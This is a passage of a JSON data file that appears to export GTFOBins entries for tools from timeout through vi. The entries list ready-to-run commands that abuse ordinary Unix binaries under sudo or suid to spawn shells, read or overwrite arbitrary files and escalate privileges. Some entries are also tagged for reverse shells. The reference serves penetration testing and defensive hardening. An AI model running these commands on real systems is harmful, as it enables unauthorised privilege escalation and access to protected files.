/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/timeout/"]},{"id":"gtfo:tmate:shell:0:sudo","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmate:shell:0:suid","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmate:shell:0:unprivileged","toolId":"gtfo:tmate","toolName":"tmate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmate -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmate/"]},{"id":"gtfo:tmux:file-read:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:file-read:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:file-read:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tmux -f /path/to/input-file","description":"The file is read and parsed as a `tmux` configuration file, part of the first invalid line is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:0:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -c /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:sudo","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:suid","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:tmux:shell:1:unprivileged","toolId":"gtfo:tmux","toolName":"tmux","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"tmux -S /path/to/socket","description":"Provided to have enough permissions to access the socket (e.g., `/tmp/tmux-xxx/default`).","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tmux/"]},{"id":"gtfo:top:shell:0:sudo","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/top/"]},{"id":"gtfo:top:shell:0:unprivileged","toolId":"gtfo:top","toolName":"top","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>~/.config/procps/toprc\ntop\n# press return twice\nreset","description":"The config path might be different.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/top/"]},{"id":"gtfo:torify:shell:0:sudo","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torify/"]},{"id":"gtfo:torify:shell:0:unprivileged","toolId":"gtfo:torify","toolName":"torify","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torify /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torify/"]},{"id":"gtfo:torsocks:shell:0:sudo","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/torsocks/"]},{"id":"gtfo:torsocks:shell:0:unprivileged","toolId":"gtfo:torsocks","toolName":"torsocks","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"torsocks /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/torsocks/"]},{"id":"gtfo:troff:file-read:0:sudo","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:troff:file-read:0:suid","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:troff:file-read:0:unprivileged","toolId":"gtfo:troff","toolName":"troff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"troff /path/to/input-file","description":"The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/troff/"]},{"id":"gtfo:tsc:file-read:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-read:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"tsc /path/to/input-file.ts","description":"Content is leaked as error messages. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-write:0:sudo","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tsc:file-write:0:unprivileged","toolId":"gtfo:tsc","toolName":"tsc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"tsc /path/to/input-file.ts --outFile /path/to/output-file","description":"Content is leaked as error messages and written to file. The file extension must be one of the supported ones, e.g., `.ts`, `.tsx`, etc.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tsc/"]},{"id":"gtfo:tshark:inherit:0:sudo","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/tshark/"]},{"id":"gtfo:tshark:inherit:0:unprivileged","toolId":"gtfo:tshark","toolName":"tshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"echo '...' >/path/to/temp-file\ntshark -Xlua_script:/path/to/temp-file","description":"This allows to run Lua code (`...`).","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/tshark/"]},{"id":"gtfo:ul:file-read:0:sudo","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:ul:file-read:0:suid","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:ul:file-read:0:unprivileged","toolId":"gtfo:ul","toolName":"ul","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ul /path/to/input-file","description":"The read file content is corrupted by replacing occurrences of `$'\\b_'` to terminal sequences and by converting tabs to spaces.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ul/"]},{"id":"gtfo:unexpand:file-read:0:sudo","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:unexpand:file-read:0:suid","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:unexpand:file-read:0:unprivileged","toolId":"gtfo:unexpand","toolName":"unexpand","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"unexpand -t999 /path/to/input-file","description":"Convert sequences of (e.g., `999`) spaces to tab.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unexpand/"]},{"id":"gtfo:uniq:file-read:0:sudo","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:uniq:file-read:0:suid","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:uniq:file-read:0:unprivileged","toolId":"gtfo:uniq","toolName":"uniq","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uniq /path/to/input-file","description":"The read file content is corrupted by squashing multiple adjacent lines.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uniq/"]},{"id":"gtfo:unshare:shell:0:sudo","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unshare:shell:0:suid","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"unshare -r /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unshare:shell:0:unprivileged","toolId":"gtfo:unshare","toolName":"unshare","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"unshare /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/unshare/"]},{"id":"gtfo:unsquashfs:privilege-escalation:0:sudo","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"]},{"id":"gtfo:unsquashfs:privilege-escalation:0:suid","toolId":"gtfo:unsquashfs","toolName":"unsquashfs","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unsquashfs shell\n./squashfs-root/sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unsquashfs/"]},{"id":"gtfo:unzip:privilege-escalation:0:sudo","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/unzip/"]},{"id":"gtfo:unzip:privilege-escalation:0:suid","toolId":"gtfo:unzip","toolName":"unzip","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"unzip -K shell.zip\n./sh -p","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/unzip/"]},{"id":"gtfo:update-alternatives:file-write:0:sudo","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"]},{"id":"gtfo:update-alternatives:file-write:0:suid","toolId":"gtfo:update-alternatives","toolName":"update-alternatives","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nupdate-alternatives --force --install /path/to/output-file x /path/to/temp-file 0","description":"Write in `/path/to/output-file` a symlink to `/path/to/temp-file`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/update-alternatives/"]},{"id":"gtfo:urlget:file-read:0:sudo","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:urlget:file-read:0:suid","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:urlget:file-read:0:unprivileged","toolId":"gtfo:urlget","toolName":"urlget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"urlget - /path/to/input-file","description":"This is part of `gettext` and usually not in `PATH`, e.g., on Arch it can be found at `/usr/lib/gettext/urlget`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/urlget/"]},{"id":"gtfo:uuencode:file-read:0:sudo","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uuencode:file-read:0:suid","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uuencode:file-read:0:unprivileged","toolId":"gtfo:uuencode","toolName":"uuencode","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"uuencode /path/to/input-file /dev/stdout | uudecode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uuencode/"]},{"id":"gtfo:uv:shell:0:sudo","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/uv/"]},{"id":"gtfo:uv:shell:0:unprivileged","toolId":"gtfo:uv","toolName":"uv","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"uv run /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/uv/"]},{"id":"gtfo:vagrant:inherit:0:sudo","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vagrant/"]},{"id":"gtfo:vagrant:inherit:0:unprivileged","toolId":"gtfo:vagrant","toolName":"vagrant","name":"inherit ← ruby","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:ruby"],"command":"echo '...' >Vagrantfile\nvagrant up","description":"This allows to run Ruby code (`...`).","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vagrant/"]},{"id":"gtfo:valgrind:shell:0:sudo","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/valgrind/"]},{"id":"gtfo:valgrind:shell:0:unprivileged","toolId":"gtfo:valgrind","toolName":"valgrind","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"valgrind /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/valgrind/"]},{"id":"gtfo:varnishncsa:file-write:0:sudo","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"]},{"id":"gtfo:varnishncsa:file-write:0:suid","toolId":"gtfo:varnishncsa","toolName":"varnishncsa","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"varnishncsa -g request -q 'ReqURL ~ \"/xxxxxxxxxx\"' -F '%{yyy}i' -w /path/to/output-file","description":"The command hangs, so the trigger command must be performed asynchronously or in another terminal:\n\n```\ncurl -H 'xxx: DATA' http://localhost:6081/xxxxxxxxxx\n```","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/varnishncsa/"]},{"id":"gtfo:vi:file-read:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-read:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-read:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"vi /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:file-write:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"vi /path/to/output-file\niDATA\n^[\nw","description":"Where `^[` is the escape key.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:0:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':!/bin/sh' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:suid","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:1:unprivileged","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"vi -c ':shell'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/vi/"]},{"id":"gtfo:vi:shell:2:sudo","toolId":"gtfo:vi","toolName":"vi","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"vi -c ':set shell=/bin/sh | 